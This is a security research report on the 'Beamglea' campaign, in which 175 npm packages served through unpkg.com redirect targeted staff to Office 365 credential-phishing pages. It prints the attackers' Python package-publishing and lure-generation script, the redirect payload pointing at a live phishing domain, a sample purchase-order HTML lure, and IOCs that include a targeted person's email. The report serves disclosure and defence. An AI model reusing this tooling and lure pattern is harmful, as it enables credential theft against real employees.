175 Malicious npm Packages Host Phishing Infrastructure Targeting 135+ Organizations

Socket's Threat Research Team uncovered 175 malicious npm packages which have collectively accumulated over 26,000 downloads, serving as infrastructure for a widespread phishing campaign targeting 135+ industrial, technology, and energy companies worldwide.

While the packages' randomized names make accidental developer installation unlikely, the download counts likely include security researchers, automated scanners, and CDN infrastructure analyzing the packages after disclosure. The campaign, which we're calling "Beamglea" based on consistent artifacts across all packages, uses npm's public registry and unpkg.com's CDN to host redirect scripts that funnel victims to credential harvesting pages. The origin and meaning of "beamglea" remains unclear - it may be a codename, inside reference, or randomly chosen identifier by the threat actors.

Prior to this disclosure, the term had virtually no presence online, making it an effective tracking identifier for this specific operation. Most of the packages associated with this campaign are currently live at the time of writing. We have petitioned for their removal as well as the suspension of the threat actor’s accounts from the npm registry.

This discovery builds on initial findings by Paul McCarty at Safety, who first identified the phishing infrastructure on September 24, 2025. Socket's AI scanner independently flagged these packages and additional variants, expanding the analysis from the initial discovery to document the current 175-package campaign infrastructure.

Supply Chain as Phishing Infrastructure#

The npm packages themselves don't execute malicious code when installed via npm install. Instead, they exploit npm as free, global hosting infrastructure for phishing attacks. unpkg[.]com is a legitimate, widely-used CDN service that automatically serves any public npm package over HTTPS. The threat actors abuse this trusted infrastructure to host their phishing components without paying for servers or SSL certificates.

Here's the complete attack chain:

1. Package Publication: Threat actors publish packages with random six-character names following the pattern redirect-[a-z0-9]{6} to npm
2. Automatic CDN Hosting: unpkg.com immediately makes these packages available via HTTPS CDN URLs like https://unpkg[.]com/redirect-xs13nr@1.0.0/beamglea.js
3. Possible Phishing Lure Distribution: Threat actors may distribute HTML files themed as purchase orders and project documents to targeted victims. While the exact distribution method is unclear, the business document themes and victim-specific customization suggest email attachment or phishing link delivery.
4. Victim Execution: When victims open the HTML file, it loads JavaScript from the unpkg.com CDN
5. Credential Harvesting: The script redirects victims to phishing pages that capture their credentials

The npm ecosystem becomes unwitting infrastructure rather than a direct attack vector. Developers who install these packages see no malicious behavior, but victims opening specially crafted HTML files are redirected to phishing sites.

Automated Package Generation#

The threat actors developed Python tooling to automate the entire campaign. Across multiple packages, we found redirect_generator.py scripts and PyInstaller-compiled executables that handle:

def generate_random_package_name(prefix="redirect-"):
    # Generates random 6-character suffix
    suffix = ''.join(random.choices(string.ascii_lowercase + string.digits, k=6))
    return prefix + suffix

# Template processing replaces placeholders with victim-specific data
template_js = load_template('beamglea_template.js')
final_js = template_js.replace("{{EMAIL}}", email).replace("{{URL}}", redirect_url)
with open("beamglea.js", "w", encoding="utf-8") as f:
    f.write(final_js)
    
# === 3. Ensure NPM Login ===
npm_user = npm_logged_in()
if not npm_user:
    print("🔑 You are not logged in to npm. Please enter your credentials:")
    npm_username = input("NPM Username: ")
    npm_password = input("NPM Password: ")
    npm_email = input("NPM Email: ")

    login_input = f"{npm_username}\n{npm_password}\n{npm_email}\n"
    run_cmd(["npm", "login"], input_text=login_input)

    npm_user = npm_logged_in()

print(f"✅ Logged in as {npm_user}")

# === 4. Create Package ===
package_name = generate_random_package_name()
package_json_path = "package.json"
initial_version = "1.0.0"

if os.path.exists(package_json_path):
    with open(package_json_path, "r", encoding="utf-8") as f:
        existing_package = json.load(f)
        if existing_package.get("name") == package_name:
            initial_version = bump_version(existing_package.get("version", "1.0.0"))

package_json = {
    "name": package_name,
    "version": initial_version,
    "main": "beamglea.js"
}

with open(package_json_path, "w", encoding="utf-8") as f:
    json.dump(package_json, f, indent=4)

# === 5. Publish to NPM ===
print("📦 Publishing to npm...")
try:
    run_cmd(["npm", "publish", "--access", "public"])
except SystemExit:
    print("⚠️ Trying to bump version and retry...")
    with open(package_json_path, "r", encoding="utf-8") as f:
        pj = json.load(f)
    pj["version"] = bump_version(pj["version"])
    with open(package_json_path, "w", encoding="utf-8") as f:
        json.dump(pj, f, indent=4)
    run_cmd(["npm", "publish", "--access", "public"])

print("✅ Package published!")

# === 6. Generate redirect.html ===
package_version = package_json["version"]
cdn_url = f"https://unpkg.com/{package_name}@{package_version}/beamglea.js"

html_content = f"""<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="html-meta" content="nb830r6x">
    <title></title>
</head>
<body>
   <div class="appcontainer"></div>
   <script src="{cdn_url}"></script>
</body>
</html>
"""

output_dir = "output"
os.makedirs(output_dir, exist_ok=True)

with open(os.path.join(output_dir, "redirect.html"), "w", encoding="utf-8") as f:
    f.write(html_content)

The automation takes three inputs: a JavaScript template file (beamglea_template.js), the victim's email address, and the phishing URL. It then:

1. Authenticates to npm: Checks if logged in, prompts for credentials if needed
2. Processes templates: Injects victim email and phishing URL into JavaScript
3. Creates package: Generates package.json with random name
4. Publishes to npm: Automatically publishes as a public package
5. Generates HTML lure: Creates the HTML file with unpkg.com CDN reference to the newly published package

This automation enabled the threat actors to create 175 unique packages targeting different organizations without manual intervention for each victim.

The JavaScript Payload#

Each package contains a simple redirect script named beamglea.js:

function processAndRedirect() {
    var email = "victim@company.com";  // Customized per target
    var urlPath = "https://cfn.jackpotmastersdanske.com/TJImeEKD";
    var finalUrl = urlPath + "#" + email;
    window.location.href = finalUrl;
}
processAndRedirect();

The script appends the victim's email as a URL fragment. URL fragments appear after the # symbol and are not sent to web servers in HTTP requests, which means they don't appear in standard server access logs. The phishing page reads the email from JavaScript context and pre-fills login forms, creating an appearance of legitimacy.

HTML Phishing Lures#

We identified 630+ HTML files across the 175 packages, using business document themes to bypass suspicion, all located in the output folder of the package:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="html-meta" content="nb830r6x">
    <title></title>
</head>
<body>
   <div class="appcontainer"></div>
   <script src="https://unpkg.com/redirect-xs13nr@1.0.0/beamglea.js"></script>
</body>
</html>

The campaign identifier nb830r6x appears in the meta tag of all HTML files. Filenames mimic legitimate business documents:

• Purchase orders: PO3725.html, PODV250918.html , Purchase Order List 2025.html
• Technical specs: Product drawing and specification for Heat Exchangers.html
• Project documents: Dutch Dipping Hydrogen Project.html

These HTML files load JavaScript from unpkg[.]com when opened in a browser, triggering the redirect to credential phishing pages.

When victims open these HTML files in a browser, the JavaScript immediately redirects to the phishing domain while passing the victim's email address via URL fragment. The phishing page then pre-fills the email field, creating a convincing appearance that the victim is accessing a legitimate login portal that already recognizes them. This pre-filled credential significantly increases the attack's success rate by reducing victim suspicion.

Command and Control Infrastructure#

The campaign uses seven phishing domains:

Primary Infrastructure (51% of packages):

• cfn.jackpotmastersdanske[.]com with path /TJImeEKD

Secondary Infrastructure:

• musicboxcr[.]com with base64-encoded parameters
• villasmbuva[.]co[.]mz (Mozambique TLD)
• cfn.fejyhy[.]com
• cfn.fenamu[.]com
• cfn.notwinningbutpartici[.]com
• elkendinsc[.]com

Some domains use base64-encoded URL parameters that reveal targeting specifics:

/s/?c3Y9bzM2NV8xX25vbSZtPThvJnVpZD1VU0VSMjMwOTIwMjVVMzkwOTIzMTQmdD1oSA==N0123N

Decoded:
sv=o365_1_nom    // Office 365, variant 1, no MFA
m=8o             // Campaign identifier
uid=USER23092025U39092314  // Session tracking: Sept 23, 2025 at 09:23:14
t=hH             // Token

The o365_1_nom parameter indicates the phishing pages specifically target Office 365 accounts without multi-factor authentication enabled.

Targeted Industries and Organizations#

The campaign targeted 135+ unique email addresses across 100+ organizations, with heavy focus on:

Industrial Manufacturing (35%):

• Algodue (industrial equipment)
• Piusi (fluid handling)
• Stratasys (3D printing)
• ArcelorMittal (steel/mining)
• Demag Cranes (material handling)

Technology/Electronics (20%):

• Moxa (industrial networking)
• D-Link (networking equipment)
• Renishaw (precision measurement)

Energy/Chemical (15%):

• Sasol (chemical/energy)
• ThyssenKrupp Nucera (hydrogen technology)
• H2 Systems (hydrogen solutions)

Most Targeted: sraka@hust[.]hr appeared in 19 separate packages, suggesting either high-value targeting or a persistent campaign against this Croatian industrial organization.

Geographic targeting focused heavily on Western Europe (Germany, Netherlands, Belgium, Italy) with secondary focus on Nordic countries and Asia-Pacific. Notably absent were US-based targets.

Campaign Scale and Effect#

Infrastructure Metrics:

• 175 npm packages published
• 9 npm author accounts
• 630+ HTML phishing lures
• 7 command and control domains
• 135+ targeted organizations
• Campaign identifier: nb830r6x

Operational Security Indicators:

• Automated package generation tooling
• PyInstaller-compiled executables for ease of use
• Documentation for setting up custom CDN infrastructure
• Multiple domain registrations for redundancy
• Randomized package names to evade pattern detection

The presence of cdn_setup_guide.txt in some packages shows long-term planning. The guide provides instructions for setting up independent hosting infrastructure using VPS and Nginx, reducing reliance on unpkg.com's CDN.

Outlook and Recommendations#

This campaign demonstrates how threat actors weaponize legitimate infrastructure at scale. By publishing 175 packages across 9 accounts and automating victim-specific HTML generation, the attackers created resilient phishing infrastructure that costs nothing to host and leverages trusted CDN services. The combination of npm's open registry, unpkg.com's automatic serving, and minimal code creates a reproducible playbook that other threat actors will adopt.

Defenders should expect this technique to evolve. Likely variations include migration to other CDN services (jsDelivr, cdnjs), incorporation of additional evasion through domain generation algorithms for phishing endpoints, time-based activation beyond simple redirects, and obfuscation of the JavaScript payload to complicate static analysis.

The campaign identifier nb830r6x in HTML meta tags suggests tracking across multiple operations, indicating organized threat actor infrastructure rather than opportunistic attacks. Expect C2 domain rotation, geofenced phishing pages that only activate for specific geographic regions or during business hours, and HTML attachments with increased sophistication mimicking DocuSign, Microsoft Office, or Adobe PDF viewers.

Organizations should treat any detection of these IOCs as an active breach requiring immediate response:

• Force password resets for all potentially compromised accounts listed in the IOC section, prioritizing Office 365 credentials given the o365_1_nom targeting parameter.
• Enable MFA across all business email and cloud services, with special attention to accounts lacking multi-factor authentication.
• Review email gateway logs for HTML attachments delivered between September and October 2025, particularly files with purchase order themes or project document naming patterns.
• Audit financial systems and wire transfer logs for unauthorized transactions, as business email compromise typically follows credential harvesting within 24-72 hours.
• Deploy network monitoring for the seven C2 domains and unpkg.com requests matching the redirect-*/beamglea.js pattern.

Beyond immediate incident response, implement defensive controls that prevent similar attacks. Configure email gateways to quarantine HTML attachments or strip them entirely, as legitimate business communication rarely requires HTML file transfers. Deploy web content filtering that blocks or alerts on unpkg.com requests to packages matching suspicious patterns, though balance this against legitimate CDN usage by development teams. Add endpoint detection rules for HTML files in Downloads folders that contain unpkg.com script references, particularly those with empty titles and minimal content. Implement browser history analysis looking for sequential navigation from local HTML files to external domains with email fragments in the URL.

Indicators of Compromise (IOCs):#

npm Packages

1. redirect-04g1my
2. redirect-0g91q6
3. redirect-0vaxnw
4. redirect-1akzwg
5. redirect-1hvx9g
6. redirect-1knxok
7. redirect-1p89nj
8. redirect-1st7z7
9. redirect-1tokin
10. redirect-1ubpyu
11. redirect-1wc4gw
12. redirect-24nt59
13. redirect-24srjd
14. redirect-297vpk
15. redirect-2aie58
16. redirect-3viu68
17. redirect-406s9z
18. redirect-47cprv
19. redirect-4a6uhw
20. redirect-4dcjkh
21. redirect-4iyfat
22. redirect-4nwrkg
23. redirect-4r6ynv
24. redirect-53bw0r
25. redirect-57j5wb
26. redirect-594t6h
27. redirect-5cxzgs
28. redirect-5iqds5
29. redirect-5lpuku
30. redirect-5r42if
31. redirect-63cl4f
32. redirect-6lvcjm
33. redirect-7bqfg6
34. redirect-7qnew0
35. redirect-7vw41m
36. redirect-7yqujr
37. redirect-8f3x70
38. redirect-8py8qs
39. redirect-8ynd96
40. redirect-95fl17
41. redirect-9iak88
42. redirect-a1gs61
43. redirect-a1jnfo
44. redirect-aw9itj
45. redirect-b9diha
46. redirect-b9fv9e
47. redirect-byj4f5
48. redirect-c1n05c
49. redirect-ch5ayp
50. redirect-ci4ynt
51. redirect-cj50k2
52. redirect-cn040w
53. redirect-colaux
54. redirect-cuvccp
55. redirect-cwfpnz
56. redirect-cx4vm0
57. redirect-d0qfku
58. redirect-dna9sd
59. redirect-dravb9
60. redirect-e19jye
61. redirect-e761hq
62. redirect-eeu53f
63. redirect-elvwba
64. redirect-eqtqym
65. redirect-evb9wa
66. redirect-ewce43
67. redirect-f1wut9
68. redirect-f72kyw
69. redirect-fd91u6
70. redirect-fhelhf
71. redirect-fohapy
72. redirect-fwx2y7
73. redirect-g0ew1n
74. redirect-g7gn31
75. redirect-g7v030
76. redirect-gbgbgh
77. redirect-gjl674
78. redirect-gzixvc
79. redirect-gzkgcn
80. redirect-h0i672
81. redirect-h4y8f0
82. redirect-hi5ag9
83. redirect-ht8x82
84. redirect-hx522h
85. redirect-icp3vd
86. redirect-igk4sd
87. redirect-iocz0a
88. redirect-j0rs4a
89. redirect-j5blfb
90. redirect-j8m62u
91. redirect-jr2idt
92. redirect-jw31kl
93. redirect-k1jlsf
94. redirect-k4s26t
95. redirect-k5j1u7
96. redirect-klea4q
97. redirect-ksm5w7
98. redirect-kz5pf4
99. redirect-l0m7on
100. redirect-l3td5c
101. redirect-l6qi9e
102. redirect-lbgja3
103. redirect-ld0k2a
104. redirect-lp2xe6
105. redirect-ltlpoj
106. redirect-lxzc6c
107. redirect-m92q7h
108. redirect-mop8sg
109. redirect-mrdlde
110. redirect-mz4116
111. redirect-n06xhl
112. redirect-n0c0pt
113. redirect-n2wvec
114. redirect-n79iht
115. redirect-n95xyv
116. redirect-nf0qo1
117. redirect-nixl3q
118. redirect-njmr1g
119. redirect-noyuan
120. redirect-nq70u6
121. redirect-nqfhsn
122. redirect-nron9d
123. redirect-nuyvwk
124. redirect-nzoblt
125. redirect-o92d2h
126. redirect-oroq43
127. redirect-p8ris1
128. redirect-pkkd5s
129. redirect-pqigpl
130. redirect-prhts6
131. redirect-q2htwu
132. redirect-q4vs8m
133. redirect-q84l3v
134. redirect-qbzqro
135. redirect-qrah57
136. redirect-qx2www
137. redirect-r0ajvl
138. redirect-r3s2jv
139. redirect-rc2ewa
140. redirect-rmunkl
141. redirect-rrfeb9
142. redirect-s7usff
143. redirect-shqv6v
144. redirect-sjcr8c
145. redirect-sormfb
146. redirect-sr2min
147. redirect-sykre1
148. redirect-t09ul0
149. redirect-t65vz6
150. redirect-t8kcsk
151. redirect-u0e2q7
152. redirect-ubp4cs
153. redirect-uc8xfg
154. redirect-udmf0u
155. redirect-uplctp
156. redirect-uxwcv8
157. redirect-v74zee
158. redirect-vlgk2c
159. redirect-vpvoos
160. redirect-w9cx9u
161. redirect-whb6rt
162. redirect-wu8gx9
163. redirect-x2giv7
164. redirect-x4imdv
165. redirect-xgcv6j
166. redirect-xi84nq
167. redirect-xs13nr
168. redirect-y8p47m
169. redirect-ystrj5
170. redirect-ytimeb
171. redirect-za4566
172. redirect-zbhdm7
173. redirect-zfwzmc
174. redirect-zoju4g
175. redirect-homer-flajpt

Malicious Domains:

• cfn.jackpotmastersdanske[.]com
• musicboxcr[.]com
• villasmbuva[.]co[.]mz
• cfn.fejyhy[.]com
• cfn.fenamu[.]com
• cfn.notwinningbutpartici[.]com
• elkendinsc[.]com

npm Aliases and Registration Emails:

• zamaniboss (frankmease22@gmail[.]com)
• ghoxt (harimetal@squbee[.]com)
• smfcs (Lee.Ja@bi-energykr[.]net)
• doggymugu (r99990077@gmail[.]com)
• flajpt (homerstreetgy@proton[.]me)
• milotank (inf@mail.]legaldispensarysearch[.]com
• remdd100 (remmdd@smartmode[.]j[.]pl)
• remdd101 (remmdd1@smartmode[.]j[.]pl)
• remdd1012 (remmdd12@smartmode[.]j[.]pl)

HTML Meta Tag

• nb830r6x

MITRE ATT&CK Techniques#

• T1195.002 — Supply Chain Compromise: Compromise Software Supply Chain
• T1583.001 — Acquire Infrastructure: Domains
• T1584.004 — Compromise Infrastructure: Server
• T1566.001 — Phishing: Spearphishing Attachment
• T1566.002 — Phishing: Spearphishing Link
• T1056.003 — Input Capture: Web Portal Capture